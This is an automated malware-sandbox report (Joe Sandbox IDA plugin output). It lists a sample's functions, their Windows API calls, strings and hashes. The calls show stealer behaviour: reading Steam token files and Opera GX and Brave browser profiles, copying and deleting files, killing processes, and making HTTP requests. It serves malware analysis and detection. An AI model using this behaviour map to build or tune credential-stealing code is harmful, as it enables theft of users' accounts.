Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchlstrlen
String ID: ERROR
API String ID: 591506033-2861137601
Opcode ID: 2d358899a8e3a44575cb247e0659d8b63467604f63a646a2ce54d2cf3c2dda0e
Instruction ID: 0d078c0cdc236700beca0b0b47c93204fe1fdbc80701c8401c66cfd9b00ae3d2
Opcode Fuzzy Hash: 2d358899a8e3a44575cb247e0659d8b63467604f63a646a2ce54d2cf3c2dda0e
Instruction Fuzzy Hash: 21112E7290060AAFCB40FB78D9065ADBBB1FF04310B544225E914A3665DB35AA29DFF1

Function 00D6858D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00D62175: lstrcpyA.KERNEL32(00000000,?,?,00D51CF7,?,00D69260), ref: 00D62194

Part of subcall function 00D5688F: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00D568F1
Part of subcall function 00D5688F: StrCmpCA.SHLWAPI(?), ref: 00D5690B
Part of subcall function 00D5688F: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D5693A
Part of subcall function 00D5688F: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00D56979
Part of subcall function 00D5688F: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00D569A9
Part of subcall function 00D5688F: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D569B4
Part of subcall function 00D5688F: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00D569D8

StrCmpCA.SHLWAPI(?,ERROR), ref: 00D685C2

Strings

ERROR, xrefs: 00D685BA
ERROR, xrefs: 00D685E5

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
String ID: ERROR$ERROR
API String ID: 3086566538-2579291623
Opcode ID: b95ed418434eb935fd7033ec4adbc61aa679ec2696d546321f3cb213b4626435
Instruction ID: e1e12918c425d5a6335dcf3a1731d8cae8d5459617a0196eb02e23c5476c340a
Opcode Fuzzy Hash: b95ed418434eb935fd7033ec4adbc61aa679ec2696d546321f3cb213b4626435
Instruction Fuzzy Hash: 44016D31940208ABCF10FB75DC479AD37A8EF49301B500661BD24A3227EA35EA0D8AF1

Function 00D68BE6 Relevance: 4.6, APIs: 3, Instructions: 70sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8,?,?), ref: 00D68C4D
CreateThread.KERNEL32(00000000,00000000,00D68B15,?,00000000,00000000), ref: 00D68C85
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00D68C8D

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleSleepThreadWait
String ID:
API String ID: 4198075804-0
Opcode ID: e53192ea0e32c17a2e83223c28168536a97df66b4bface8a6c8d5f067af85ff7
Instruction ID: fc075b4c1614f362b5df61c9c4cb76189df9803e204301620ccfd571acaef845
Opcode Fuzzy Hash: e53192ea0e32c17a2e83223c28168536a97df66b4bface8a6c8d5f067af85ff7
Instruction Fuzzy Hash: 50210A7680021D9BCF00EF55DC458DE7BB8FF45354B118126F915A7211DB34AA4ADBB0

Function 00D63EE1 Relevance: 4.5, APIs: 3, Instructions: 36COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00D65B27,00000000,?), ref: 00D63F03
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00D63F1E
CloseHandle.KERNEL32(00000000), ref: 00D63F25

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: a448fb72403e6ff2334283e4e814be38d5053af93d3e1dd33a3aafc8d6621d0e
Instruction ID: ff9e4bf608102ba182332621423ff59a668eff258f78c8765520edf652f7e41b
Opcode Fuzzy Hash: a448fb72403e6ff2334283e4e814be38d5053af93d3e1dd33a3aafc8d6621d0e
Instruction Fuzzy Hash: 00F0B47560021CBBD750EB68DC45FEE77BCEB45700F000456BA44D7190CFB0DA859BA0

Function 00D6807F Relevance: 3.1, APIs: 2, Instructions: 101stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D63A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00D63A59

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00D680C7
lstrcatA.KERNEL32(?), ref: 00D680E5

Part of subcall function 00D67D20: wsprintfA.USER32 ref: 00D67D67
Part of subcall function 00D67D20: FindFirstFileA.KERNEL32(?,?), ref: 00D67D7E
Part of subcall function 00D67D20: StrCmpCA.SHLWAPI(?,00D87AF4), ref: 00D67D9F
Part of subcall function 00D67D20: StrCmpCA.SHLWAPI(?,00D87AF8), ref: 00D67DB9
Part of subcall function 00D67D20: wsprintfA.USER32 ref: 00D67DE0
Part of subcall function 00D67D20: StrCmpCA.SHLWAPI(?,00D876B6), ref: 00D67DF4
Part of subcall function 00D67D20: wsprintfA.USER32 ref: 00D67E11
Part of subcall function 00D67D20: PathMatchSpecA.SHLWAPI(?,?), ref: 00D67E3E
Part of subcall function 00D67D20: lstrcatA.KERNEL32(?), ref: 00D67E74
Part of subcall function 00D67D20: lstrcatA.KERNEL32(?,00D87B10), ref: 00D67E86
Part of subcall function 00D67D20: lstrcatA.KERNEL32(?,?), ref: 00D67E99
Part of subcall function 00D67D20: lstrcatA.KERNEL32(?,00D87B14), ref: 00D67EAB
Part of subcall function 00D67D20: lstrcatA.KERNEL32(?,?), ref: 00D67EBF

Part of subcall function 00D67D20: wsprintfA.USER32 ref: 00D67E28
Part of subcall function 00D67D20: CopyFileA.KERNEL32(?,?,00000001), ref: 00D67F78
Part of subcall function 00D67D20: DeleteFileA.KERNEL32(?), ref: 00D67FEC
Part of subcall function 00D67D20: FindNextFileA.KERNEL32(?,?), ref: 00D6804E
Part of subcall function 00D67D20: FindClose.KERNEL32(?), ref: 00D68062

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: 4f67c149e7e34b0bba4d3782189762bff1552d5696593f88338204e18a7d0649
Instruction ID: 4e2c43d261307e45bbc2a0a0af66bbeb1ef361c9de7f2e2c74612c4eeae8a8e8
Opcode Fuzzy Hash: 4f67c149e7e34b0bba4d3782189762bff1552d5696593f88338204e18a7d0649
Instruction Fuzzy Hash: FF31937A80000DAFDF06EB64DC03EF97779FB08305F0404A6BA1493221EA729A999F71

Function 00D68D06 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

lstrlenA.KERNEL32(?), ref: 00D68D4D

Part of subcall function 00D68BE6: CreateThread.KERNEL32(00000000,00000000,00D68B15,?,00000000,00000000), ref: 00D68C85
Part of subcall function 00D68BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00D68C8D

Strings

Soft\Steam\steam_tokens.txt, xrefs: 00D68D5D

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
String ID: Soft\Steam\steam_tokens.txt
API String ID: 502913869-3507145866
Opcode ID: 7dd131f814e5b0a890e9b65f7cbe2f86a46beb0a14ac304f319ded368d5064f7
Instruction ID: d01253c09eefe38d217ccf7b41e0be97a075bf2ae97b983255ae86b487712629
Opcode Fuzzy Hash: 7dd131f814e5b0a890e9b65f7cbe2f86a46beb0a14ac304f319ded368d5064f7
Instruction Fuzzy Hash: 15011A36D441096B8F00BBA5DC478EEBB78EF05351F504161BE4063216DB316A4E8AB1

Function 00D69C8D Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4470a2f539e30a03af7e76d7c2693d1d0b11191d2fa31606a572f4d5da71eb05
Instruction ID: 5bc5be4ce01efb31f1ffa3cc58895c8a8f7cb7e11de78847596c2bcc1dc2362c
Opcode Fuzzy Hash: 4470a2f539e30a03af7e76d7c2693d1d0b11191d2fa31606a572f4d5da71eb05
Instruction Fuzzy Hash: E4517EB5811700ABDF217BFE85AABB4F6D8AFB0325B190556E8008A136DB318D849E75

Function 00D63A18 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00D63A59

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 749010fbd5b68581e16f7caf34536f6c5a4d053c33801dcf909255e21365dc2c
Instruction ID: 76153af459cfbf47984cd29fd6ec0ef237ffe81beeb3fe7ca443ca56decd7ec3
Opcode Fuzzy Hash: 749010fbd5b68581e16f7caf34536f6c5a4d053c33801dcf909255e21365dc2c
Instruction Fuzzy Hash: F3F03071E1016DABDB15DF68DC509AEB7FCEB48300F0045B6B909D3251DA709F458BA0

Function 00D639EE Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,?,?,00D5EA72,?,?,?), ref: 00D639F5

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: ae01b46a1b0b5fda245fd824ab55da26e8acbc7194c4c130327d325178b8d13a
Instruction ID: 900651fcb6efd94f9be518cd2749c0ec532e52328d9c796b33fafae8e4adc5ac
Opcode Fuzzy Hash: ae01b46a1b0b5fda245fd824ab55da26e8acbc7194c4c130327d325178b8d13a
Instruction Fuzzy Hash: E1D0A731100038674A1016EDDD094ABBF18DB067B9B104321FDDDC61B0D321DE626BE0

Function 00D64387 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SHFileOperationA.SHELL32(?), ref: 00D643BD

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 1e462ef7a0098c7ba66f2741d25d7e105b392ba10c132d54cc16b09ff9362e03
Instruction ID: 08e9953707349ad1d375f963f05c0a9223657cdbdcfaa9eb84dbd3af2fee0eb0
Opcode Fuzzy Hash: 1e462ef7a0098c7ba66f2741d25d7e105b392ba10c132d54cc16b09ff9362e03
Instruction Fuzzy Hash: D7E075B4D0421D9ECB41EFA499092DDBAF8AF08308F104169C115F2340E37486098BA5

Function 00D63A7B Relevance: 1.3, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00D68680,?), ref: 00D63A93

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 842bf6b61382a035eed37193ece2ac58e23a946448532254a3f39ac56e42a341
Instruction ID: 40d6b4ccccabd55242a33cd48c1bcfa333fb2bd0be9d99693de0f03ebd625568
Opcode Fuzzy Hash: 842bf6b61382a035eed37193ece2ac58e23a946448532254a3f39ac56e42a341
Instruction Fuzzy Hash: E4E02B36A01B141B872209AACD0456ABB9ADFC1B60F0D412ADECBCB354C531CD0992F0

Non-executed Functions

Function 00D5A941 Relevance: 67.3, APIs: 29, Strings: 9, Instructions: 780filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D62223: lstrcpyA.KERNEL32(00000000,?,0000000C,00D69228,00D87803), ref: 00D62251
Part of subcall function 00D62223: lstrcatA.KERNEL32(?,?), ref: 00D6225B

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

FindFirstFileA.KERNEL32(?,?,00D8786B,00D8786A,00D88464,00D87867,?,?,?), ref: 00D5A9EB
StrCmpCA.SHLWAPI(?,00D88468), ref: 00D5AA13
StrCmpCA.SHLWAPI(?,00D8846C), ref: 00D5AA2D

Part of subcall function 00D621A5: lstrlenA.KERNEL32(?,?,00D69098,00D877FE,00D87787,?,?,?,?,00D69D6E), ref: 00D621AB
Part of subcall function 00D621A5: lstrcpyA.KERNEL32(00000000,00000000,?,00D69098,00D877FE,00D87787,?,?,?,?,00D69D6E), ref: 00D621DD

StrCmpCA.SHLWAPI(?,Opera GX,00D88470,?,00D8786E), ref: 00D5AABF
StrCmpCA.SHLWAPI(?,Brave,00D88490,00D88494,00D88470,?,00D8786E), ref: 00D5AC41
StrCmpCA.SHLWAPI(?,Preferences), ref: 00D5AC5B
CopyFileA.KERNEL32(?,?,00000001), ref: 00D5AD1B
DeleteFileA.KERNEL32(?), ref: 00D5ADEA
StrCmpCA.SHLWAPI(?), ref: 00D5AE28
StrCmpCA.SHLWAPI(?), ref: 00D5AE92
StrCmpCA.SHLWAPI(00D5DCCC), ref: 00D5AEA9
CopyFileA.KERNEL32(?,?,00000001), ref: 00D5AFA1

Part of subcall function 00D62175: lstrcpyA.KERNEL32(00000000,?,?,00D51CF7,?,00D69260), ref: 00D62194

Part of subcall function 00D640F6: _memset.LIBCMT ref: 00D6411D
Part of subcall function 00D640F6: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 00D641C3
Part of subcall function 00D640F6: TerminateProcess.KERNEL32(00000000,00000000), ref: 00D641D1
Part of subcall function 00D640F6: CloseHandle.KERNEL32(00000000), ref: 00D641D8

_memset.LIBCMT ref: 00D5B03F
lstrcatA.KERNEL32(?,?), ref: 00D5B051
